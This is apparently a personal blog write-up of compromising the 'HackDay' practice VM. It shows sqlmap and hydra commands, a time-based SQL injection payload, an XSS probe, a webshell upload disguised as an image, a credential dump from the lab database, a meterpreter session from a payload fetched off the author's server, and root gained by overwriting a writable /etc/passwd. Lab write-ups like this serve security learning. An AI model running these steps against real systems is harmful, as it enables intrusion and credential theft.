HackDay VM Writeup

Please pardon the informality in this post 😛

First did an nmap scan on all ports.

Had 22 and 8008 open.

Browsed to 8008 and had a meme on the front page.

Ran Nikto and found interesting robots.txt

Started plugging and chugging until this one gave

Navigated to vulnbank/

At this point it’s been 5 minutes and I’ve made a lot of progress.

I threw a single quote into the username field and got a sql error back so I ran sqlmap.

Sqlmap seemed to be able to inject into the username field, however, I wasn’t able to get any information out of it… I should probably get better at sql injection.

sqlmap –url http://192.168.1.235:8008/unisxcudkqjydw/vulnbank/client/login.php –data=’username=admin’

Next I tried a hydra brute force with the username admin and using the rock you password list.

hydra 192.168.1.235 http-form-post “/unisxcudkqjydw/vulnbank/client/login.php:username=^USER^&password=^PASS^:Invalid” -l admin -P rockyou.txt -t 32 -w 30 -o hydra_output.txt -s 8008

After struggling with both these tools for a while I decided to run dirb and found two directories. One contained to images. One being this meme.

The other directory found was a /upload/ which yields a white screen… Which I have no idea what to do with…

At this point I’m kinda stuck. Not knowing what to do, I went back to sqlmap. It had a generated payload that started with (username=1’ — ) I plugged that in an didn’t get an error… So I started throwing random stuff.

Got stuck and looked at a walkthrough right here. This was the syntax I needed. Which I didn’t even know.

username=1′ RLIKE SLEEP(5) –

C:\Users\Graham Thomas\Pictures\HackDay Vm\AfterLogin.png

I see the upload function and immediately think webshell

Plugged <script>Alert(1)</script> and got xxs in the problem field. Tried uploading my php webshell but only image files are allowed. Uploaded the webshell as an image and now I’m going to try to rename it.

Just a heads up. No way to remove the xxs. So now it’s really annoying.

Changed the extension to .jpg and navigated to it. And it still executed… Not exactly sure why. C:\Users\Graham Thomas\Pictures\HackDay Vm\Got Shell.png

I looked around, no easy cronjobs or noticeable files. So I decide to see if there are any hardcoded passwords in the website that we were trying to get sql injection in.

Sure enough, we found some database passwords

C:\Users\Graham Thomas\Pictures\HackDay Vm\database infor.png

$db_host = “127.0.0.1”;

$db_name = “bank_database”;

$db_user = “root”;

$db_password = “NuCiGoGo321”;

I try to start using mysql but I can’t because my shell isn’t good enough

So I had to pass them over the cmd line with this command

mysql -u root -p -e ‘Show Tables’ bank_database

mysql -u root -p -e ‘Select * From klienti’ bank_database

Got this back

ID emer mbiemer bilanci username password

1 Charles D. Hobson 25000 hobson Charles123

\n Fischer 120000 jeff jeff321

Tried the jeff user but it doesn’t look like he has anything that Charles didn’t.

Kinda got stuck again. Thought I could do something after finding those creds but couldn’t find anything. So I started trying to find was to priv escalate. First things first is check /etc/passwd.

taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

This looks like the user I probably need to get to.

Decided to transfer a unix privesc-check script using apache and wget.

However, it needed strings to run so no luck there. No idea how a linux system doesn’t have strings…

Anyway! I ran this one liner to find writeable files.

find / -perm -0002 -type f -print -xdev 2>/dev/null

/etc/passwd

/tmp/privs

/tmp/priv.sh

The two files in temp were my uploaded privesc check script.

And turns out I can write to /etc/passwd. However, I’m not sure this is a lead but it’s worth looking into.

C:\Users\Graham Thomas\Pictures\HackDay Vm\EtcPasswd.png

However, since my shell is so bad, I can’t edit it with nano or vi. So I gotta figure out how to upgrade it.

Finally figured out how to generate a msfpayload.

Uploaded it to the target using my apache server and then got a meterpreter session.

C:\Users\Graham Thomas\Pictures\HackDay Vm\Meterp.png

Here you can see all my failed payload generations!

So now I needed to add a password to /etc/passwd/ so I can su. After trying a bunch of things I couldn’t get it so I looked at the Walkthrough by G0blin – https://g0blin.co.uk/albania-vulnhub-writeup/.

openssl passwd -1 -salt salt letmein

I couldn’t seem to use any text editor so I created the file on my desktop, uploaded it. And then

Cat passwd > /etc/passwd

Now I have root.

Leave a Reply

Your email address will not be published. Required fields are marked *